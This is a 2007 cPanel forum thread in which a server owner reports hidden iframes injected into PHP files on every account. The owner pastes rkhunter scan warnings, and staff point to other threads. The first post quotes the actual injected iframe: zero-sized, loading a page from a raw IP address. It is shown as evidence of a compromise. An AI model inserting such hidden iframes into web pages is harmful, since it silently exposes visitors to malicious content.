The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

iframes injections problem and rkhunter warnings

Discussion in 'General Discussion' started by xserverx, Aug 25, 2007.

  1. xserverx

    xserverx Member

    Joined:
    Jun 10, 2007
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.

    Code:
    <iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
    
    what is the reason and how to fix that ?:confused:


    and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem :
    rkhunter results:
    Code:
    Checking system commands...
    
      Performing 'strings' command checks
        Checking 'strings' command                               [ OK ]
    
      Performing 'shared libraries' checks
        Checking for preloading variables                        [ None found ]
        Checking for preload file                                [ Not found ]
        Checking LD_LIBRARY_PATH variable                        [ Not found ]
    
      Performing file properties checks
       [COLOR=Red][B] Checking for prerequisites                               [ Warning ][/B][/COLOR]
      .....
        /usr/bin/awk                                             [ OK ]
        /usr/bin/chattr                                          [ OK ]
        /usr/bin/curl                                            [ OK ]
        /usr/bin/cut                                             [ OK ]
        /usr/bin/diff                                            [ OK ]
        /usr/bin/dirname                                         [ OK ]
        /usr/bin/du                                              [ OK ]
        /usr/bin/env                                             [ OK ]
        /usr/bin/file                                            [ OK ]
        /usr/bin/find                                            [ OK ]
    [B][COLOR=Red]     /usr/bin/GET                                             [ Warning ]
        /usr/bin/groups                                          [ Warning ][/COLOR][/B]
        /usr/bin/head                                            [ OK ]
        /usr/bin/id                                              [ OK ]
        /usr/bin/kill                                            [ OK ]
        /usr/bin/killall                                         [ OK ]
        /usr/bin/last                                            [ OK ]
        /usr/bin/lastlog                                         [ OK ]
    [B][COLOR=Red]     /usr/bin/ldd                                             [ Warning ][/COLOR][/B]
        /usr/bin/less                                            [ OK ]
        /usr/bin/locate                                          [ OK ]
        /usr/bin/logger                                          [ OK ]
        /usr/bin/w                                               [ OK ]
        /usr/bin/watch                                           [ OK ]
        /usr/bin/wc                                              [ OK ]
        /usr/bin/wget                                            [ OK ]
    [B][COLOR=Red]     /usr/bin/whatis                                          [ Warning ][/COLOR][/B]
        /usr/bin/whereis                                         [ OK ]
        /usr/bin/which                                           [ OK ]
        /usr/bin/who                                             [ OK ]
        /usr/bin/whoami                                          [ OK ]
        /usr/bin/gawk                                            [ OK ]
        /sbin/chkconfig                                          [ OK ]
        /sbin/depmod                                             [ OK ]
        /sbin/ifconfig                                           [ OK ]
      [COLOR=Red][B]  /sbin/ifdown                                             [ Warning ][/B][/COLOR]
    [B][COLOR=Red]     /sbin/ifup                                                  [ Warning ][/COLOR][/B]
        /sbin/init                                               [ OK ]
        /sbin/insmod                                             [ OK ]
        /sbin/ip                                                 [ OK ]
        /sbin/lsmod                                              [ OK ]
        /sbin/modinfo                                            [ OK ]
        /sbin/modprobe                                           [ OK ]
        /sbin/nologin                                            [ OK ]
        /sbin/rmmod                                              [ OK ]
        /sbin/runlevel                                           [ OK ]
        /sbin/sulogin                                            [ OK ]
        /sbin/sysctl                                             [ OK ]
        /sbin/syslogd                                            [ OK ]
        /usr/sbin/adduser                                        [ OK ]
        /usr/sbin/chroot                                         [ OK ]
        /usr/sbin/groupadd                                       [ OK ]
        /usr/sbin/groupdel                                       [ OK ]
        /usr/sbin/groupmod                                       [ OK ]
    
        /usr/sbin/usermod                                        [ OK ]
        /usr/sbin/vipw                                           [ OK ]
        /usr/sbin/xinetd                                         [ OK ]
        /usr/local/bin/perl                                      [ OK ]
        /usr/local/bin/rkhunter                                  [ OK ]
    
    
    
      Performing additional rootkit checks
        Suckit Rookit additional checks                          [ OK ]
        Checking for possible rootkit files and directories      [ None found ]
        Checking for possible rootkit strings                    [ None found ]
    
      Performing malware checks
        Checking running processes for suspicious files          [ None found ]
        Checking for login backdoors                             [ None found ]
        Checking for suspicious directories                      [ None found ]
        Checking for sniffer log files                           [ None found ]
    
      Performing trojan specific checks
        Checking for enabled xinetd services                     [ None found ]
        Checking for Apache backdoor                             [ Not found ]
    
      Performing Linux specific checks
        Checking kernel module commands                          [ OK ]
        Checking kernel module names                             [ OK ]
    Checking the network...
    
      Performing check for backdoor ports
        Checking for UDP port 2001                                [ Not found ]
        Checking for TCP port 2006                                [ Not found ]
        Checking for TCP port 2128                                [ Not found ]
        Checking for TCP port 14856                              [ Not found ]
        Checking for TCP port 47107                              [ Not found ]
        Checking for TCP port 60922                              [ Not found ]
    
      Performing checks on the network interfaces
        Checking for promiscuous interfaces                      [ None found ]
    
    Checking the local host...
    
      Performing system boot checks
        Checking for local host name                             [ Found ]
        Checking for local startup files                         [ Found ]
        Checking local startup files for malware                 [ None found ]
        Checking system startup files for malware                [ None found ]
    
      Performing group and account checks
        Checking for passwd file                                 [ Found ]
        Checking for root equivalent (UID 0) accounts            [ None found ]
        Checking for passwordless accounts                       [ None found ]
        Checking for passwd file changes                         [ None found ]
        Checking for group file changes                          [ None found ]
        Checking root account shell history files                [ OK ]
    
      Performing system configuration file checks
        Checking for SSH configuration file                      [ Found ]
    [B][COLOR=Red]     Checking if SSH root access is allowed                   [ Warning ][/COLOR][/B]
    [COLOR=Red][B]     Checking if SSH protocol v1 is allowed                   [ Warning ][/B][/COLOR]
        Checking for running syslog daemon                       [ Found ]
        Checking for syslog configuration file                   [ Found ]
        Checking if syslog remote logging is allowed             [ Not allowed ]
    
      Performing filesystem checks
        Checking /dev for suspicious file types                  [ None found ]
        Checking for hidden files and directories                [ Warning ]
    Checking application versions...
    
        Checking version of Exim MTA                             [ OK ]
    [B][COLOR=Red]     Checking version of GnuPG                                [ Warning ][/COLOR][/B]
        Checking version of Apache                               [ Skipped ]
        Checking version of Bind DNS                             [ OK ]
    [COLOR=Red][B]     Checking version of OpenSSL                              [ Warning ][/B][/COLOR]
        Checking version of PHP                                  [ OK ]
        Checking version of Procmail MTA                         [ OK ]
        Checking version of OpenSSH                              [ OK ]
    
    
    System checks summary
    =====================
    
    File properties checks...
        Required commands check failed
        Files checked: 129
        Suspect files: 6
    
    Rootkit checks...
        Rootkits checked : 114
        Possible rootkits: 0
    
    Applications checks...
        Applications checked: 8
        Suspect applications: 2
    
    The system checks took: 3 minutes and 12 seconds
    
    All results have been written to the logfile (/var/log/rkhunter.log)
    
    One or more warnings have been found while checking the system.
    Please check the log file (/var/log/rkhunter.log)
    
    how can I fix all this problem please ????
     
  2. xserverx

    xserverx Member

    Joined:
    Jun 10, 2007
    Messages:
    24
    Likes Received:
    0
    Trophy Points:
    1
    can someone help please ?
     
  3. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member

    Joined:
    May 20, 2003
    Messages:
    14,446
    Likes Received:
    195
    Trophy Points:
    63
    Location:
    Pennsylvania
    cPanel Access Level:
    Root Administrator
    Twitter:
    Sounds like you need to hire and expert to have a look at your server if you're not sure whats going on. You might also search the forums for the word iframes. The first result is this thread, the second thread is pages long called iframe / javascript hacks?
    http://forums.cpanel.net/showthread.php?t=62821&highlight=iframes

    Might be something useful there for you.

    Good luck.
     

Share This Page